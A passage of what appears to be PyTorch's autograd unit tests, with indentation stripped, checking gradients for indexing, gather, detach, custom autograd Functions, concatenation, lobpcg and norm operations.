value = x.new(x[index].size()).fill_(7)
value.requires_grad = True
y[index] = value
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad_input = torch.ones(*size)
expected_grad_input[index] = 0
self.assertEqual(x.grad, expected_grad_input)
self.assertEqual(value.grad, torch.ones_like(value))
# case when x broadcasts to as y[1]
x = torch.randn(4, requires_grad=True)
y = torch.zeros(2, 3, 4)
y[1] = x
y.backward(torch.randn(2, 3, 4))
self.assertEqual(x.size(), x.grad.size())
def test_setitem(self):
self._test_setitem((5, 5), 1)
self._test_setitem((5,), 1)
self._test_setitem((1,), 0)
self._test_setitem((10,), [[0, 4, 2]])
self._test_setitem((5, 5), [[0, 4], [2, 2]])
self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5), 3)
self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]])
self._test_setitem_tensor((5,), 3)
self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum())
self._test_setitem_tensor((5,), [[0, 1, 2, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1,
3]), requires_grad=False), [2, 4], slice(None)])
def test_setitem_mask(self):
mask = torch.BoolTensor(5, 5).bernoulli_()
self._test_setitem((5, 5), Variable(mask))
self._test_setitem((5,), Variable(mask[0]))
self._test_setitem((1,), Variable(mask[0, 0:1]))
self._test_setitem_tensor((5, 5), Variable(mask))
self._test_setitem_tensor((5,), Variable(mask[0]))
def test_select_sum(self):
# both select and sum return Scalars in ATen; ensure they work together.
x = torch.randn(10, dtype=torch.double, requires_grad=True)
def func(x):
return x.select(0, 1).sum()
gradcheck(func, [x])
gradgradcheck(func, [x])
def test_diagonal_expanded_v(self):
value = torch.rand([])
v_expanded = torch.tensor(value).expand(10)
a = torch.rand(10, 10, dtype=torch.double, requires_grad=True)
result, = torch.autograd.grad(a.diagonal(), a, v_expanded)
self.assertEqual(result, torch.eye(10, dtype=torch.double) * value)
def test_select_expanded_v(self):
v_expanded = torch.rand(10).expand(10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[0], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[0] = v_expanded
self.assertEqual(result, expected)
def test_slice_expanded_v(self):
v_expanded = torch.rand(10, 1).expand(2, 10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[3:5], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[3:5] = v_expanded
self.assertEqual(result, expected)
def test_unbind(self):
stacked = torch.randn(3, 10, 10, requires_grad=True)
x, y, z = stacked.unbind()
grad = torch.randn(3, 10, 10)
torch.autograd.backward([x, y, z], grad.unbind())
self.assertEqual(stacked.grad, grad)
# check that it works with only one gradient provided (#9977)
for i in range(3):
stacked = torch.randn(3, 10, 10, requires_grad=True)
outs = stacked.unbind()
gi = grad.unbind()[i]
g, = torch.autograd.grad(outs[i], stacked, gi)
g_expected = torch.stack([gi if j == i else torch.zeros_like(gi)
for j in range(3)], dim=0)
self.assertEqual(g, g_expected)
def test_fill(self):
root = torch.randn(4, 5, requires_grad=True)
def func(root):
x = root.clone()
x.fill_(2)
return x
gradcheck(func, [root])
gradgradcheck(func, [root])
def test_unused_output(self):
x = torch.randn(10, 10, requires_grad=True)
outputs = x.chunk(5)
o = outputs[2]
o = o * 4 + 2
o.sum().backward()
expected_grad = torch.zeros(10, 10)
expected_grad[4:6] = 4
self.assertEqual(x.grad, expected_grad)
with torch.no_grad():
x.grad.zero_()
grad_output = torch.randn(2, 10)
outputs = x.chunk(5)
outputs[0].backward(grad_output)
expected_grad = torch.zeros(10, 10)
expected_grad[:2] = grad_output
self.assertEqual(x.grad, expected_grad)
def _test_sparse_gather(self, size_x, size_ind, dim):
x = torch.randn(size_x, requires_grad=True)
if len(size_ind) > 0 and len(size_x) > 0:
ind = torch.randint(x.size(dim), size_ind)
else:
ind = torch.zeros(size_ind, dtype=torch.int64)
out = torch.gather(x, dim, ind, sparse_grad=False)
grad = torch.rand_like(out)
out.backward(grad)
grad_dense = x.grad.clone()
x.grad = None
out = torch.gather(x, dim, ind, sparse_grad=True)
out.backward(grad)
self.assertEqual(grad_dense, x.grad.to_dense())
def test_sparse_gather_dim0(self):
self._test_sparse_gather((10, 10), (5, 10), 0)
def test_sparse_gather_dim1(self):
self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1)
def test_sparse_gather_dim_neg(self):
self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1)
def test_sparse_gather_ind_scalar(self):
self._test_sparse_gather((10,), (), 0)
def test_sparse_gather_x_scalar(self):
self._test_sparse_gather((), (2,), 0)
def test_sparse_gather_both_scalar(self):
self._test_sparse_gather((), (), 0)
def test_gc_in_destructor(self):
"""
Previously, if a Function destructor triggered a garbage collection,
the Variable's tp_dealloc handler would get called twice leading to a
segfault.
"""
class CollectOnDelete(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
def __del__(self):
gc.collect()
for _ in range(10):
CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward()
# Delete this test when legacy custom autograd functions are deleted.
def test_naughty_legacy_variable_grad_fn(self):
class Id(Function):
def forward(self, x):
return x
def backward(self, grad_x):
return grad_x
self.assertRaises(RuntimeError, lambda: Variable(torch.zeros(1), _grad_fn=Id()))
# Delete this test when legacy custom autograd functions are deleted.
def test_naughty_legacy_function_backward_before_forward(self):
class Id(Function):
def forward(self, x):
return x
def backward(self, grad_x):
return grad_x
f = Id()
self.assertRaises(RuntimeError, lambda: f._do_backward((torch.zeros(0), ), False))
# Delete this test when legacy custom autograd functions are deleted.
def test_naughty_legacy_function_early_access(self):
class Id(Function):
def forward(self, x):
return x
def backward(self, grad_x):
return grad_x
f = Id()
# A legacy autograd function is not fully initialized until you actually
# apply it. That means a lot of accessors on them don't actually work.
# Test that we properly error in this case.
self.assertRaises(RuntimeError, lambda: f.register_hook(lambda x, y: None))
self.assertRaises(RuntimeError, lambda: f.next_functions)
self.assertRaises(RuntimeError, lambda: f.metadata)
@unittest.expectedFailure
def test_naughty_anomaly_access(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, g):
return g
x = torch.zeros(1, requires_grad=True)
y = MyFunction.apply(x)
y.backward()
y.grad_fn.metadata
g = y.grad_fn
del y
g.metadata # this currently fails, but shouldn't
def test_naughty_autograd_function_stashing_ctx(self):
saved_ctx = []
class Id(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_ctx.append(ctx)
return ctx.saved_tensors
p = torch.zeros(1, requires_grad=True)
loss = Id.apply(p)
loss.backward(retain_graph=True)
del loss
# At this point in time, it complains that the graph has been freed
# (which indeed true, although a somewhat indirect way of stating the
# problem).
self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors)
def test_custom_autograd_repeated_grad_grad(self):
# This test failed the equality check in PR #22983; it's an interesting
# and different test case worth enshrining. mult1 is not testing
# anything that interesting, but mult2 is the interesting case.
def mult1(x):
return x.prod(dim=-1).prod(dim=-1)
class Mult(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = mult1(x)
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return (grad_output * y)[:, None, None] / x
mult2 = Mult.apply
def check_gradgrad_repeated(x, y):
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1])
x = torch.ones(2, 4, 4).requires_grad_()
check_gradgrad_repeated(x, mult1(x))
check_gradgrad_repeated(x, mult2(x))
def test_custom_autograd_no_early_free(self):
# This test failed complaining that buffers had already been freed
# prior to #22983. Also pretty interesting test case.
class Double(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = x ** 2
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, _ = ctx.saved_tensors
return grad_output * 2 * x
# this is equivalent, but uses the output of .forward() in .backward()
class Double2(Double):
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return grad_output * 2 * y / x
double = Double.apply
double2 = Double2.apply
x = torch.tensor(2).double().requires_grad_()
self.assertTrue(gradcheck(double, x))
self.assertTrue(gradgradcheck(double, x))
self.assertTrue(gradcheck(double2, x))
self.assertTrue(gradgradcheck(double2, x))
y = double(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x)
y = double2(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x) # should not error!
def test_detach(self):
x = torch.randn(10, 10, requires_grad=True)
y = x + 2
y = y.detach()
z = y * 4 + 2
self.assertFalse(y.requires_grad)
self.assertFalse(z.requires_grad)
x = torch.randn(10, 10, requires_grad=True)
y = x * 2
y = y.detach()
self.assertFalse(y.requires_grad)
self.assertIsNone(y.grad_fn)
z = x + y
z.sum().backward()
# This is an incorrect gradient, but we assume that's what the user
# wanted. detach() is an advanced option.
self.assertEqual(x.grad, torch.ones(10, 10))
# in-place detach
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
a = x * 2
(y + a).sum().backward(retain_graph=True)
a.detach_()
self.assertFalse(a.requires_grad)
(y + a).sum().backward() # this won't backprop to x
self.assertEqual(x.grad, torch.ones(10, 10) * 2)
self.assertEqual(y.grad, torch.ones(10, 10) * 2)
# in-place deatch on a view raises an exception
view = x.narrow(0, 1, 4)
self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_())
def test_detach_base(self):
"detaching base does not detach view"
x = torch.randn(10, 10, requires_grad=True)
view = x.narrow(0, 1, 4)
x.detach_()
self.assertFalse(x.requires_grad)
self.assertTrue(view.requires_grad)
self.assertIsNotNone(view.grad_fn)
self.assertIs(view._base, x)
def _test_type_conversion_backward(self, t, ):
fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True)
fvar.double().sum().backward()
self.assertEqual(fvar.grad, torch.ones_like(fvar))
self.assertEqual(type(fvar.grad), type(fvar))
dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True)
dvar.float().sum().backward()
self.assertEqual(dvar.grad, torch.ones_like(dvar))
self.assertEqual(type(dvar.grad), type(dvar))
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.int(), torch.IntTensor)
if torch.cuda.is_available():
self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor)
self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor)
self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor)
if torch.cuda.device_count() >= 2:
x2 = x.float().cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
x2 = x.float().cuda()
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 0)
x2 = x2.cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
y = Variable(torch.randn(5).cuda(1), requires_grad=True)
y.cpu().sum().backward()
self.assertIs(y.grad.get_device(), 1)
self.assertIs(y.long().get_device(), 1)
for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]:
for y_var in (True, False):
y = torch.randint(5, (5, 5), dtype=t.dtype)
y = Variable(y) if y_var else y
self.assertIsInstance(x.type(t), t)
self.assertIsInstance(x.type_as(y), t)
# TODO: t.dtype should work
t_dtype = t().dtype
self.assertIsInstance(x.type(t_dtype), t)
self.assertIs(t_dtype, x.type(t_dtype).dtype)
self.assertEqual(y.data_ptr(), y.type(t).data_ptr())
if torch.cuda.is_available():
for x_cuda in (True, False):
for y_cuda in (True, False):
x_c = x.cuda() if x_cuda else x
y_c = y.cuda() if y_cuda else y
_, y_type = y_c.type().rsplit('.', 1)
y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type
self.assertEqual(y_c.type(), x_c.type(y_typestr).type())
self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype)
self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr())
self._test_type_conversion_backward(lambda x: x)
if torch.cuda.is_available():
self._test_type_conversion_backward(lambda x: x.cuda())
if torch.cuda.device_count() >= 2:
# one of these has to be the non-default device
self._test_type_conversion_backward(lambda x: x.cuda(0))
self._test_type_conversion_backward(lambda x: x.cuda(1))
def test_isolated_node(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
b = torch.max(a, 1, True)[1].repeat(1, 5).double()
o = (b + a).sum()
o.backward()
def test_shape(self):
x = torch.randn(3, 4)
self.assertEqual(2, len(x.shape))
self.assertEqual(x.shape[0], 3)
self.assertEqual(x.shape[1], 4)
def test_numpy_requires_grad(self):
x = torch.randn(2, 2, requires_grad=True)
err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead."
with self.assertRaisesRegex(RuntimeError, err_msg_outputs):
x.numpy()
with torch.no_grad():
x.numpy()
x = torch.randn(2, 2)
x.numpy()
with torch.no_grad():
x.numpy()
def test_return_leaf(self):
class Identity(Function):
@staticmethod
def forward(ctx, a, b):
return a, a + b
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a + grad_b, grad_b
hook_called = [False]
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q, p = Identity.apply(x, y)
# Make sure hooks only receive grad from usage of q, not x.
def hook(grad):
hook_called[0] = True
self.assertEqual(grad, torch.ones(5, 5))
q.register_hook(hook)
(q + p + x).sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5) * 3)
self.assertEqual(y.grad, torch.ones(5, 5))
self.assertTrue(hook_called[0])
def test_return_leaf_inplace(self):
class Inplace(InplaceFunction):
@staticmethod
def forward(ctx, a, b):
ctx.mark_dirty(a)
return a.add_(b), b + 2
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a, grad_a + grad_b
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
fn = Inplace(True)
q, p = fn.apply(x, y)
self.assertIs(q, x)
self.assertIs(q.grad_fn.__class__, fn._backward_cls)
self.assertTrue(q.requires_grad)
q.sum().backward()
self.assertEqual(y.grad, torch.ones(5, 5))
def test_leaf_assignment(self):
x = torch.randn(5, 5)
y = torch.randn(5, requires_grad=True)
z = torch.randn(5, requires_grad=True)
x[0] = y
x[1] = 2 * z
self.assertTrue(x.requires_grad)
self.assertIsNot(x.grad_fn, None)
x.sum().backward()
self.assertEqual(y.grad, torch.ones(5))
self.assertEqual(z.grad, torch.ones(5) * 2)
def test_no_grad_assignment(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5)
with torch.no_grad():
x[0] = y
self.assertTrue(x.requires_grad)
self.assertIsNone(x.grad_fn)
def test_no_grad_modifies_version(self):
x = torch.randn(5, requires_grad=True)
y = torch.randn(5, requires_grad=True)
z = (x * y).sum()
with torch.no_grad():
x *= 2
self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation',
lambda: z.backward())
def test_no_grad_input(self):
class MyFunction(Function):
@staticmethod
def forward(self, x):
return x
@staticmethod
def backward(self, grad_output):
return grad_output
x = torch.randn(5, requires_grad=True)
with torch.no_grad():
y = MyFunction.apply(x)
self.assertTrue(x.requires_grad)
self.assertIsNone(y.grad_fn)
def test_backward_copy(self):
# This tests checks backward engine for a very subtle bug that appreared
# in one of the initial versions of autograd. Gradients tensors were
# simply stored in lists while the function waited for all its gradients
# to be computed. However, sometimes an output was used multiple times,
# so the gradients needed to be summed. Engine used to keep a need_copy
# set of tensors that will need a clone upon next addition and removed
# them from the set as soon as the clone was performed. However, this
# could lead to incorrect results if the same gradient tensor was
# buffered in three places in the graph:
# 1. When accumulating gradients in one of these places it was cloned
# and removed from need_copy set.
# 2. When accumulating in second place, it wasn't in the need_copy set,
# so the gradients were simply accumulated in-place (which already
# modified the grad in 3rd place)
# 3. When accumulating in the third place, it wasn't in the need_copy set
# as well, so the incoming gradient was summed in-place, yielding
# incorrect results in all functions, except the first one.
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5, requires_grad=True)
# Simulate that we're in the middle of the graph
a = x + 2
b = y + 2
c = x + 2
# This op will just return grad_output two times in backward
add1 = a + b
add2 = add1 + c
# Simulate a long branch, so grad_output will get buffered.
for _ in range(4):
a = a * 2
b = b * 2
c = c * 2
branch = a + b + c
out = add2 + branch
# expected gradients are:
# for x: 34 (16 from final a, 16 from final c, 2 from add2)
# for y: 17 (16 from final b, 1 from add2)
grad_output = torch.ones(5, 5)
out.backward(grad_output)
self.assertEqual(x.grad, torch.ones(5, 5) * 34)
self.assertEqual(y.grad, torch.ones(5, 5) * 17)
def test_save_none_for_backward(self):
test_case = self
class MyFn(Function):
@staticmethod
def forward(ctx, input):
ctx.save_for_backward(None, input, None)
return input * input
@staticmethod
def backward(ctx, grad_output):
n1, input, n2 = ctx.saved_tensors
test_case.assertIsNone(n1)
test_case.assertIsNone(n2)
return 2 * input * grad_output
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, 2 * x)
def test_too_many_grads(self):
class MyFn(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None, None
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, torch.ones_like(x))
def test_pickle(self):
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=False)
def assert_strict_equal(var1, var2):
self.assertEqual(var1, var2)
self.assertEqual(var1.requires_grad, var2.requires_grad)
serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)]
for dump in serialized:
xc, yc = pickle.loads(dump)
assert_strict_equal(xc, x)
assert_strict_equal(yc, y)
def test_dep_nograd(self):
class F1(Function):
@staticmethod
def forward(ctx, input):
out = torch.randn(input.size())
ctx.mark_non_differentiable(out)
return input, out
@staticmethod
def backward(ctx, grad_output, ignored):
return grad_output
class F2(Function):
@staticmethod
def forward(ctx, input, ignored):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None
x = torch.randn(5, requires_grad=True)
a, b = F1.apply(x)
b = b + 1 # separate F1 from F2 by another op
self.assertTrue(a.requires_grad)
self.assertFalse(b.requires_grad)
c = F2.apply(a, b)
c.backward(torch.ones(c.size()))
self.assertEqual(x.grad, torch.ones(x.size()))
def test_set_grad_enabled(self):
x = torch.tensor([1.], requires_grad=True)
with torch.set_grad_enabled(False):
y = x * 2
self.assertFalse(y.requires_grad)
with torch.set_grad_enabled(True):
y = x * 2
self.assertTrue(y.requires_grad)
with torch.set_grad_enabled(False):
torch.set_grad_enabled(True)
y = x * 2
self.assertTrue(y.requires_grad)
def test_simple_reentrant(self):
y_data = torch.randn(2, 2)
class Reenter(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x, requires_grad=True)
ctx.y = Variable(y_data, requires_grad=True)
ctx.output_var = ctx.x * ctx.y
return ctx.output_var.detach()
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
ctx.output_var.sum().backward()
return ctx.x.grad * grad_output
# Reentrant starts on CPU thread, finishs on GPU thread
x = torch.randn(2, 2, requires_grad=True)
out = Reenter.apply(x)
out.sum().backward()
self.assertEqual(x.grad, y_data)
def test_reentrant_child_error(self):
# Parent graph.
a = torch.rand(3, 3, requires_grad=True)
c = a * a
# Reentrant child graph.
b = torch.rand(3, 3, requires_grad=True)
e = b * b
f = TestAutograd.SimulateBackwardError.apply(e)
reentrant_root = f.sum()
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will throw an error.
reentrant_root.backward()
return grad
d = ReentrantFunc.apply(c)
with self.assertRaisesRegex(Exception, 'Simulate error'):
d.sum().backward()
def test_broadcast_tensors(self):
f_args_variable = (torch.randn(3, dtype=torch.double, requires_grad=True),
torch.randn(1, 2, 1, dtype=torch.double, requires_grad=True),
torch.randn(1, 1, dtype=torch.double, requires_grad=True),
torch.randn(5, 1, 1, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_broadcast_tensors", "broadcast",
lambda a, b, c, d: torch.broadcast_tensors(a, b, c, d),
True, f_args_variable, f_args_tensor)
def test_block_diag(self):
f_args_variable = (torch.randn(1, S, dtype=torch.double, requires_grad=True),
torch.randn(2, S, dtype=torch.double, requires_grad=True),
torch.randn(3, S, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_block_diag", "block_diag",
lambda a, b, c: torch.block_diag(a, b, c),
True, f_args_variable, f_args_tensor)
def test_cat(self):
f_args_variable = (torch.randn(1, S, S, dtype=torch.double, requires_grad=True),
torch.randn(2, S, S, dtype=torch.double, requires_grad=True),
torch.randn(3, S, S, dtype=torch.double, requires_grad=True),
0)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor)
def test_cat_negdim_1(self):
f_args_variable = (torch.randn(S, S, 1, dtype=torch.double, requires_grad=True),
torch.randn(S, S, 2, dtype=torch.double, requires_grad=True),
torch.randn(S, S, 3, dtype=torch.double, requires_grad=True),
-1)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_negdim_1", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor)
def test_cat_negdim_2(self):
f_args_variable = (torch.randn(S, 1, S, dtype=torch.double, requires_grad=True),
torch.randn(S, 2, S, dtype=torch.double, requires_grad=True),
torch.randn(S, 3, S, dtype=torch.double, requires_grad=True),
-2)
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_negdim_2", "cat",
lambda a, b, c, dim: torch.cat((a, b, c), dim),
True, f_args_variable, f_args_tensor)
def test_cat_empty_legacy(self):
f_args_variable = (torch.randn(0, dtype=torch.double, requires_grad=True),
torch.randn(S, S, dtype=torch.double, requires_grad=True))
# gradgradcheck doesn't work, probably because legacy size tracking is wrong somewhere,
# hence False passed below, but gradcheck checked explicitly.
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_empty_legacy", "cat",
lambda a, b: torch.cat((a, b)),
False, f_args_variable, f_args_tensor)
self.assertTrue(gradcheck(lambda a, b: torch.cat((a, b)), f_args_variable, eps=1e-6, atol=PRECISION))
def test_cat_empty(self):
f_args_variable = (torch.randn(0, S, dtype=torch.double, requires_grad=True),
torch.randn(S, S, dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_cat_empty", "cat",
lambda a, b: torch.cat((a, b)),
True, f_args_variable, f_args_tensor)
def test_trapz(self):
f_args_variable = (torch.randn(2, 3, dtype=torch.double, requires_grad=True),
torch.tensor([[1.0, 2.0, 5.5], [2.3, 0.5, 6.2]], dtype=torch.double, requires_grad=True))
f_args_tensor = deepcopy(unpack_variables(f_args_variable))
run_functional_checks(self, "test_trapz", "trapz",
lambda y, x: torch.trapz(y, x),
True, f_args_variable, f_args_tensor)
def test_var_mean_differentiable(self):
dim = [2, 4]
keepdim = False
input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True)
input2 = deepcopy(input1)
var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim)
var2 = input2.var(dim=dim, keepdim=keepdim)
mean2 = input2.mean(dim=dim, keepdim=keepdim)
grad = torch.randn(3, 4, 6, 3, requires_grad=True)
r1 = var1 * var1 * mean1 * mean1
r2 = var2 * var2 * mean2 * mean2
self.assertTrue(torch.allclose(r1, r2, rtol=0.01, atol=0.0))
torch.autograd.backward(r1, grad)
torch.autograd.backward(r2, grad)
self.assertTrue(torch.allclose(input1.grad, input2.grad, rtol=0.01, atol=0.0))
@slowTest
@skipIfNoLapack
def test_lobpcg(self):
def func(k, A, largest=True, B=None):
X_shape = list(A.shape)
X_shape[-1] = k
X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device)
if A.dim() > 2:
X = X.expand(X_shape)
D, U = torch.lobpcg(A=A, k=k, B=B, X=X)
# LOBPCG uses a random initial eigenspace approximation
# if parameter `X` is not provided.
# This may cause a non-deterministic behavior
# when it comes to the sign of an eigenvector
# (note if v is an eigenvector, so is -v),
# hence we eliminate this non-determinism
# by making sure that each column of U
# gets multiplied by the sign of its max (in absolute value) element.
# Also, gradcheck changes the content of the input by +/- eps (default to 1e-06)
# to compute the numerical gradient which can also cause the signs to flip.
_, idx = U.abs().max(-2, keepdim=True)
sign = U.gather(-2, idx).sign()
U = U * sign
return D, U
def run_symeig_test(k, sizes, largest=True):
A = torch.rand(*sizes).double()
A = A.matmul(A.transpose(-1, -2)) / 10
A.requires_grad_(True)
gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False)
# Custom gradient vectors for better stability due to some
# non-determinism in the lobpcg's forward.
# Note it is not required if symeig is in forward instead (tested).
D_grad = torch.rand(*A.shape[:-2], k) / 100
U_grad = torch.rand(*A.shape[:-1], k) / 100
gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False)
# check whether A.grad is symmetric
A = A.detach().requires_grad_(True)
D, U = func(k, A, largest)
(D.sum() + U.sum()).backward()
self.assertEqual(A.grad, A.grad.transpose(-1, -2))
# the tests below take about 1-2 minutes to finish,
# but we want to be extra sure that the backward is correct.
for largest in [True, False]:
run_symeig_test(1, (6, 6), largest=largest)
run_symeig_test(1, (2, 6, 6), largest=largest)
run_symeig_test(1, (2, 2, 6, 6), largest=largest)
run_symeig_test(2, (6, 6), largest=largest)
run_symeig_test(2, (2, 6, 6), largest=largest)
run_symeig_test(2, (2, 2, 6, 6), largest=largest)
run_symeig_test(3, (9, 9), largest=largest)
run_symeig_test(3, (2, 9, 9), largest=largest)
run_symeig_test(3, (2, 2, 9, 9), largest=largest)
def test_variable_traverse(self):
def get_out_and_unrefed_cycle():
inp = torch.randn(10, requires_grad=True)
tmp = inp.view(10, 1)
out = tmp.view(10)
# Create a reference cycle that contains an
# intermediary Variable in the graph
my_list = []
my_list.append(tmp)
my_list.append(my_list)
return out
out = get_out_and_unrefed_cycle()
gc.collect()
# This will segfault if things have been erroneously released
out.backward(torch.randn(out.size()))
def test_norm_subgradient(self):
def run_test(input_size, norm_deg):
input = torch.zeros(*input_size, requires_grad=True)
input.norm(norm_deg).backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), 2)
run_test((10, 10), 2)
run_test((10,), 3)
run_test((10,), 1)
run_test((10,), 1.5)
run_test((10,), inf)
def test_norm_inf_subgradient(self):
def run_test(input, expected, dim=None):
x = torch.tensor(input, requires_grad=True)
out = x.norm(inf, dim=dim, keepdim=True)
out.backward(torch.ones(out.size()))
self.assertEqual(x.grad, expected)
run_test([0., 0., 0.], [0., 0., 0.])
run_test([1., 0., 1.], [0.5, 0., 0.5])
run_test([[1., 0., 1.], [0., 1., 1.]], [[0.25, 0., 0.25], [0., 0.25, 0.25]])
run_test([[1., 0., 1.], [0., 1., 0.]], [[0.5, 0., 0.5], [0., 1., 0.]], (1,))
run_test(torch.ones((2, 2, 2)), torch.full((2, 2, 2), 0.25), (0, 2))
def test_pow_zero_tensor_gradient(self):
def run_test(input_size, exponent):
input = torch.zeros(*input_size, requires_grad=True)
input.pow(exponent).sum().backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), torch.zeros(10))
run_test((10, 10), torch.zeros(10, 10))
run_test((10,), 0)
def test_pow_scalar_base(self):
a = torch.arange(1, 13, dtype=torch.double).view(3, 4).requires_grad_()
gradcheck(lambda a: torch.pow(2, a), (a,))
def test_sinc(self):
# The derivative of sinc(x) at x=0 has to be special cased.
# A naive computation will result in 0/0 -> NaN.
# We also need to be careful when we are very close to 0, as the
# derivative's denominator is squared, and there are some floats
# that are positive and whose squares are zero.
a = torch.tensor([0.0, torch.finfo(torch.double).tiny, 1.0],
dtype=torch.double,
requires_grad=True)
gradcheck(torch.sinc, a)
def test_igamma(self):
# 1e-3 offset to avoid zeros
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double) + 1e-3).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_igammac(self):
# 1e-3 offset to avoid zeros in s
# NOTE: derivative for s is not implemented
